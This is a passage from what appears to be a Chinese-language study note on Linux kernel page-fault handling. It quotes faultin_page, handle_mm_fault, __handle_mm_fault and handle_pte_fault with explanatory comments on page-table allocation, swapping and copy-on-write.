	/* mlock all present pages, but do not fault in new pages */
    // mlock所有的页面,但是不要在新的页面中出现异常
	if ((*flags & (FOLL_POPULATE | FOLL_MLOCK)) == FOLL_MLOCK)
		return -ENOENT;
    //根据FOLL_标志设置FAULT_FLAG_标志
	if (*flags & FOLL_WRITE)
		fault_flags |= FAULT_FLAG_WRITE;
	if (*flags & FOLL_REMOTE)
		fault_flags |= FAULT_FLAG_REMOTE;
	if (nonblocking)
		fault_flags |= FAULT_FLAG_ALLOW_RETRY;
	if (*flags & FOLL_NOWAIT)
		fault_flags |= FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_RETRY_NOWAIT;
	if (*flags & FOLL_TRIED) {
		VM_WARN_ON_ONCE(fault_flags & FAULT_FLAG_ALLOW_RETRY);
		fault_flags |= FAULT_FLAG_TRIED;
	}
	//处理缺页异常
	ret = handle_mm_fault(vma, address, fault_flags);
	if (ret & VM_FAULT_ERROR) {
		if (ret & VM_FAULT_OOM)
			return -ENOMEM;
		if (ret & (VM_FAULT_HWPOISON | VM_FAULT_HWPOISON_LARGE))
			return *flags & FOLL_HWPOISON ? -EHWPOISON : -EFAULT;
		if (ret & (VM_FAULT_SIGBUS | VM_FAULT_SIGSEGV))
			return -EFAULT;
		BUG();
	}

	if (tsk) {
		if (ret & VM_FAULT_MAJOR)
			tsk->maj_flt++;
		else
			tsk->min_flt++;
	}

	if (ret & VM_FAULT_RETRY) {
		if (nonblocking)
			*nonblocking = 0;
		return -EBUSY;
	}

	/*
	 * The VM_FAULT_WRITE bit tells us that do_wp_page has broken COW when
	 * necessary, even if maybe_mkwrite decided not to set pte_write. We
	 * can thus safely do subsequent page lookups as if they were reads.
	 * But only do so when looping for pte_write is futile: in some cases
	 * userspace may also be wanting to write to the gotten user page,
	 * which a read fault here might prevent (a readonly page might get
	 * reCOWed by userspace write).
	 */
	if ((ret & VM_FAULT_WRITE) && !(vma->vm_flags & VM_WRITE))
	        *flags &= ~FOLL_WRITE;
	return 0;
}

handle_mm_fault()

handle_mm_fault()这是一个包裹函数, 进行一个预处理后调用真正的处理函数__handle_mm_fault()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
int handle_mm_fault(struct vm_area_struct *vma, unsigned long address,
		unsigned int flags)
{
	int ret;

	__set_current_state(TASK_RUNNING);

	count_vm_event(PGFAULT);
	mem_cgroup_count_vm_event(vma->vm_mm, PGFAULT);

	/* do counter updates before entering really critical section. */
	check_sync_rss_stat(current);

	if (!arch_vma_access_permitted(vma, flags & FAULT_FLAG_WRITE,
					    flags & FAULT_FLAG_INSTRUCTION,
					    flags & FAULT_FLAG_REMOTE))
		return VM_FAULT_SIGSEGV;

	/*
	 * Enable the memcg OOM handling for faults triggered in user
	 * space.  Kernel faults are handled more gracefully.
	 */
	if (flags & FAULT_FLAG_USER)
		mem_cgroup_oom_enable();

	if (unlikely(is_vm_hugetlb_page(vma)))
		ret = hugetlb_fault(vma->vm_mm, vma, address, flags);
	else
		ret = __handle_mm_fault(vma, address, flags);

__handle_mm_fault()

__handle_mm_fault()先进行一些简单的处理,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static int __handle_mm_fault(struct mm_struct *mm, struct vm_area_struct *vma,
			     unsigned long address, unsigned int flags)
{
	pgd_t *pgd;
	pud_t *pud;
	pmd_t *pmd;
	pte_t *pte;

	if (unlikely(is_vm_hugetlb_page(vma)))
		return hugetlb_fault(mm, vma, address, flags);
	//下一步就是在页表中分配逐级分配对应的页表项,pgd中每一项总是存在的, 因此不需要分配, 但是对于次级页表就不一样了
	pgd = pgd_offset(mm, address);//找到页全局目录
	pud = pud_alloc(mm, pgd, address); //在页全局目录中分配页上级目录
	if (!pud)
		return VM_FAULT_OOM;
	pmd = pmd_alloc(mm, pud, address);//在页上级目录中分配页中级目录
	if (!pmd)
		return VM_FAULT_OOM;
1
2
3
	//在页中级目录中分配页表项PTE
	if (unlikely(pte_alloc(mm, pmd, address)))
        return VM_FAULT_OOM;

现在address的相关页表结构已经建立完毕,调用handle_pte_fault()处理PTE引起的异常,也就是要真正分配页框并设置PTE以建立完整的映射了

1
2
3
4
5
	//在pmd中找到address对应的pte
	pte = pte_offset_map(pmd, address);
	//处理pte异常
	return handle_pte_fault(mm, vma, address, pte, pmd, flags);
}

handle_pte_fault()

  • 这个函数也适合分配器函数,首先处理页不存在的情况,会衍生处三种处理
    • 匿名映射区刚刚建立页表项造成PTE为none,调用do_anonymous_page()处理
    • 文件映射区刚刚建立页表项造成PTE为none,调用do_fault()处理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
static int handle_pte_fault(struct mm_struct *mm,
		     struct vm_area_struct *vma, unsigned long address,
		     pte_t *pte, pmd_t *pmd, unsigned int flags)
{
	pte_t entry;
	spinlock_t *ptl;

	/*
	 * some architectures can have larger ptes than wordsize,
	 * e.g.ppc44x-defconfig has CONFIG_PTE_64BIT=y and CONFIG_32BIT=y,
	 * so READ_ONCE or ACCESS_ONCE cannot guarantee atomic accesses.
	 * The code below just needs a consistent view for the ifs and
	 * we later double check anyway with the ptl lock held. So here
	 * a barrier will do.
	 */
	entry = *pte;
	barrier();
	if (!pte_present(entry)) {//页不存在的请求,即entry中P bit为0
		if (pte_none(entry)) {//entry整个就是0,说明此页表刚刚申请,这是第一次调用需要分配页框建立映射
			if (vma_is_anonymous(vma)) //如果VMA是匿名映射调用do_anonymous_page()处理
				return do_anonymous_page(mm, vma, address,
							 pte, pmd, flags);
			else	//否则就是映射到文件,调用do_fault()处理
				return do_fault(mm, vma, address, pte, pmd,
						flags, entry);
		}
        //页不存在,但是PTE不是0,说明这个映射存在,只是页框被换入到了硬盘中了,现在需要从硬盘中调入内存中
		return do_swap_page(mm, vma, address,
					pte, pmd, flags, entry);
	}

	if (pte_protnone(entry))
		return do_numa_page(mm, vma, address, entry, pte, pmd);
/*接着判断页存在的缺页异常, 这种情况就属于写时复制了, 调用do_wp_page()处理, 然后写入pte并更新缓存
写时复制: 进程需要映射一个可读可写入页, 内核之前偷懒, 只分配了一个可读页, 这样多个进程就可以共享一个页, 现在进程真的需要写入了, 就只能把原来页复制一份给他写入*/
    //先给pte上锁,因为要进行写入操作了
	ptl = pte_lockptr(mm, pmd);
	spin_lock(ptl);
    /*
    	这一步有一点trick,entry初始化为*pte
    		如果是页不存在造成的缺页异常,会进入上面的if(!pte_present(entry))
    			经过处理后*pte至少会被添加上P标志,因此会与entry不同
    		如果不是页不存在造成的,那么*pte会与entry一致
    			就会进入后续COW的逻辑,并重新写入pte
    */
	if (unlikely(!pte_same(*pte, entry)))
		goto unlock;
    //页存在,那么就是由写入引发的缺页异常,调用do_wp_page()进行写时复制操作
	if (flags & FAULT_FLAG_WRITE) {
		if (!pte_write(entry))
			return do_wp_page(mm, vma, address,
					pte, pmd, ptl, entry);
		entry = pte_mkdirty(entry);
	}
	entry = pte_mkyoung(entry);
	if (ptep_set_access_flags(vma, address, pte, entry, flags & FAULT_FLAG_WRITE)) {
		update_mmu_cache(vma, address, pte);
	} else {
		/*
		 * This is needed only for protection faults but the arch code
		 * is not yet telling us if this is a protection fault or not.
		 * This still avoids useless tlb flushes for .text page faults
		 * with threads.
		 */
		if (flags & FAULT_FLAG_WRITE)
			flush_tlb_fix_spurious_fault(vma, address);
	}
unlock:
	pte_unmap_unlock(pte, ptl);
	return 0;
}